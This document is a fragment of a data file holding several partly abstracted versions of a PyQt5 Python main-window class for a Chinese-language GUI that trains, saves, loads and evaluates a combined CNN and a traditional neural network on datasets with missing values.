if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n 
label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n 
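# initUI draws its horizontal divider as a 1pt QLabel with a black-background
# stylesheet. Qt ships a dedicated widget for rules; a sketch of the idiomatic
# drop-in for that splitterLine label:
from PyQt5.QtWidgets import QFrame

splitterLine = QFrame()
splitterLine.setFrameShape(QFrame.HLine)    # horizontal rule
splitterLine.setFrameShadow(QFrame.Sunken)  # subtle engraved look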
trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n 
setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n 
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n 
dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n 
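# initConnect wires nineteen buttons with identical clicked.connect lines. A
# hedged refactoring sketch: drive the wiring from a (button, slot) table so
# adding a control is a one-line change. Attribute names mirror initUI.
def initConnect(self):
    pairs = [
        (self.dataFileChooseButton, self.chooseData),
        (self.dataFileChooseButtonT, self.chooseData),
        (self.dataLossSimulateSettingButton, self.setLossParameter),
        (self.dataLossSimulateSettingButtonT, self.setLossParameter),
        (self.dataShowButton, self.showData),
        (self.dataShowButtonT, self.showData),
        (self.dataPreProcessButtonT, self.preProcess),
        (self.setModelParametersButton, self.setModelParameters),
        (self.setModelParametersButtonT, self.setModelParameters),
        (self.trainingButton, self.training),
        (self.trainingButtonT, self.training),
        (self.saveModelButton, self.saveModel),
        (self.saveModelButtonT, self.saveModel),
        (self.loadModelButton, self.loadModel),
        (self.loadModelButtonT, self.loadModel),
        (self.showResultButton, self.showResult),
        (self.showResultButtonT, self.showResult),
        (self.judgeResultButton, self.showJudge),
        (self.judgeResultButtonT, self.showJudge),
    ]
    for button, slot in pairs:
        button.clicked.connect(slot)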
self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n <function token>\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if 
succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n 